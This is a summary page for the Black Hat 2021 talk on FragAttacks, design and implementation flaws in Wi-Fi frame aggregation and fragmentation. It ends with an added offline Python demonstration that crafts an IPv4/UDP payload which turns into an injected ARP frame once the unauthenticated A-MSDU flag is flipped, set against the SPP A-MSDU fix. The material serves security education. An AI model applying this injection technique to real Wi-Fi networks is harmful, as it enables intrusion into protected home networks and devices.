
FragAttacks: Breaking Wi-Fi through Fragmentation and Aggregation

Conference:  BlackHat USA 2021

2021-08-05

Summary

The presentation discusses design and implementation flaws in Wi-Fi that let an adversary inject packets into protected networks and, in the demonstrated cases, take control of devices, together with the root causes of these flaws and possible fixes.
  • Design flaws in Wi-Fi's frame aggregation and fragmentation features allow packet injection into protected networks
  • Implementation flaws, several of them widespread and trivial to exploit, allow plaintext packet injection and remote control of devices
  • Root causes and potential solutions for these vulnerabilities are discussed
The presenter demonstrates how the A-MSDU aggregation flaw can be used to inject packets towards a router, allowing an attacker to reach other devices in the victim's home network. They also show how an implementation flaw can be used to remotely turn a power socket on and off without knowing the password of the Wi-Fi network.

Abstract

This presentation introduces three novel security-related design flaws in Wi-Fi and various widespread implementation flaws. An adversary can abuse these to inject packets or exfiltrate selected frames. As an example, it will be demonstrated how packet injection can be used to punch a hole in the router's NAT so the adversary can connect to and exploit internal devices in the network (e.g. BlueKeep against Windows 7).

The first design flaw is present in Wi-Fi's frame aggregation feature, where a flag in the Wi-Fi header is not properly protected. The other two design flaws are present in Wi-Fi's frame fragmentation feature, where the receiver improperly verifies and manages fragments. Although these design flaws can be non-trivial to exploit, they affect all protected Wi-Fi networks. Some design flaws even affect the ancient WEP protocol, meaning these flaws have been part of Wi-Fi since 1997.

In practice, the implementation vulnerabilities are the most concerning. Several are widespread and trivial to exploit. For example, some devices accept plaintext frames in a protected Wi-Fi network and others accept plaintext aggregated frames that resemble handshake messages. The resulting attacks will be demonstrated, such as turning an IoT power socket on and off, and a tool will be released that can be used to test Wi-Fi products against all the discovered vulnerabilities.
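The aggregation flaw in the abstract comes down to one header bit, the A-MSDU Present bit (bit 7 of the QoS Control field), being left out of the data that CCMP authenticates. The following is an added example, not code from the talk or its test tool, that builds the CCMP additional authenticated data (AAD) both the original way and with SPP A-MSDU (which keeps the bit in the AAD), and then parses one constructed decrypted payload either as a single MSDU or, once the bit is flipped, as a chain of A-MSDU subframes. The MAC addresses, the ARP packet and the IPv4/UDP wrapper are constructed sample data; the AAD builder is simplified to a QoS Data frame without Address 4.

```python
"""Added example (not the talk's code or its FragAttacks tool).

Under the original CCMP AAD rules the A-MSDU Present bit of the QoS Control
field is masked out of the authenticated data, so flipping it does not
invalidate the MIC.  The receiver then parses the same decrypted body as
A-MSDU subframes.  SPP A-MSDU keeps the bit in the AAD and closes the gap.
All addresses and packet contents below are constructed sample data.
"""
import struct

AMSDU_PRESENT = 1 << 7                       # QoS Control bit 7
LLC_SNAP = b"\xaa\xaa\x03\x00\x00\x00"       # LLC + SNAP OUI, EtherType follows


def ccmp_aad(fc, a1, a2, a3, seq_ctrl, qos_ctrl, spp_amsdu=False):
    """CCMP AAD for a QoS Data frame without Address 4 (simplified).

    Frame Control: subtype bits 4-6, Retry, Power Mgmt and More Data masked,
    Protected Frame forced to 1.  Sequence Control: sequence number masked,
    fragment number kept.  QoS Control: only the TID survives, plus the
    A-MSDU Present bit when SPP A-MSDU is in use.
    """
    fc = (fc & ~((0x7 << 4) | (1 << 11) | (1 << 12) | (1 << 13))) | (1 << 14)
    sc = seq_ctrl & 0x000F
    qc_mask = 0x000F | (AMSDU_PRESENT if spp_amsdu else 0)
    return struct.pack("<H", fc) + a1 + a2 + a3 + struct.pack("<HH", sc, qos_ctrl & qc_mask)


def parse_amsdu(payload):
    """Split a decrypted MPDU body into A-MSDU subframes: DA, SA, Length, body, pad to 4."""
    subframes, off = [], 0
    while off + 14 <= len(payload):
        da, sa = payload[off:off + 6], payload[off + 6:off + 12]
        (length,) = struct.unpack(">H", payload[off + 12:off + 14])
        body = payload[off + 14:off + 14 + length]
        if len(body) != length:
            raise ValueError("truncated A-MSDU subframe")
        subframes.append((da, sa, body))
        off = (off + 14 + length + 3) & ~3   # next subframe starts on a 4-byte boundary
    return subframes


def interpret(payload, qos_ctrl):
    """What a receiver does with the body, depending on the (possibly flipped) flag."""
    if qos_ctrl & AMSDU_PRESENT:
        return ("amsdu", parse_amsdu(payload))
    (ethertype,) = struct.unpack(">H", payload[6:8])   # single MSDU: LLC/SNAP, then EtherType
    return ("msdu", ethertype)


def ipv4_checksum(header):
    s = sum(struct.unpack(">10H", header))
    s = (s & 0xFFFF) + (s >> 16)
    s = (s & 0xFFFF) + (s >> 16)
    return (~s) & 0xFFFF


# --- constructed sample frame ------------------------------------------------
AP_MAC, VICTIM_MAC, ATTACKER_MAC = (bytes.fromhex(h) for h in
                                    ("02aabbcc00ff", "02aabbcc0001", "02aabbcc0002"))

# The packet the attacker wants delivered once the flag is flipped: an ARP request.
ARP = struct.pack(">HHBBH6s4s6s4s", 1, 0x0800, 6, 4, 1,
                  ATTACKER_MAC, bytes([192, 168, 1, 99]), bytes(6), bytes([192, 168, 1, 1]))
INNER_SUBFRAME_BODY = LLC_SNAP + b"\x08\x06" + ARP
INNER_SUBFRAME = (VICTIM_MAC + ATTACKER_MAC
                  + struct.pack(">H", len(INNER_SUBFRAME_BODY)) + INNER_SUBFRAME_BODY)

# Carried as UDP data in an ordinary IPv4 packet.  Bytes 12-13 of the body are
# the IPv4 Identification field, which becomes the first subframe's Length once
# the body is read as an A-MSDU; 22 makes the second subframe start exactly at
# the UDP data (offset 8 + 20 + 8 = 36, already 4-byte aligned).
IP_ID = 8 + 20 + 8 - 14
UDP_HEADER = struct.pack(">HHHH", 40000, 5353, 8 + len(INNER_SUBFRAME), 0)
ip_hdr = struct.pack(">BBHHHBBH4s4s", 0x45, 0, 20 + len(UDP_HEADER) + len(INNER_SUBFRAME),
                     IP_ID, 0, 64, 17, 0, bytes([10, 0, 0, 5]), bytes([192, 168, 1, 7]))
IP_HEADER = ip_hdr[:10] + struct.pack(">H", ipv4_checksum(ip_hdr)) + ip_hdr[12:]
PAYLOAD = LLC_SNAP + b"\x08\x00" + IP_HEADER + UDP_HEADER + INNER_SUBFRAME


def aad_flip_unnoticed(spp_amsdu):
    """True if flipping A-MSDU Present leaves the AAD, and so the CCMP MIC, unchanged."""
    fc, sc, tid = 0x0088, 0x0120, 0x0006      # QoS Data, seq 18 / frag 0, TID 6
    honest = ccmp_aad(fc, VICTIM_MAC, AP_MAC, AP_MAC, sc, tid, spp_amsdu)
    flipped = ccmp_aad(fc, VICTIM_MAC, AP_MAC, AP_MAC, sc, tid | AMSDU_PRESENT, spp_amsdu)
    return honest == flipped


if __name__ == "__main__":
    print("legacy CCMP: flip unnoticed =", aad_flip_unnoticed(False))
    print("SPP A-MSDU : flip unnoticed =", aad_flip_unnoticed(True))
    print("flag clear :", interpret(PAYLOAD, 6))
    kind, subs = interpret(PAYLOAD, 6 | AMSDU_PRESENT)
    for da, sa, body in subs:
        print("flag set   : subframe DA=%s SA=%s len=%d" % (da.hex(), sa.hex(), len(body)))
```

With the flag clear the body is one IPv4 packet; with the flag set the first subframe is the leftover IP and UDP header bytes (a receiver drops it as a frame for the nonsense address aa:aa:03:00:00:00) and the second subframe is the attacker's ARP request addressed to the victim. Only the SPP A-MSDU AAD construction makes the flipped bit detectable.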
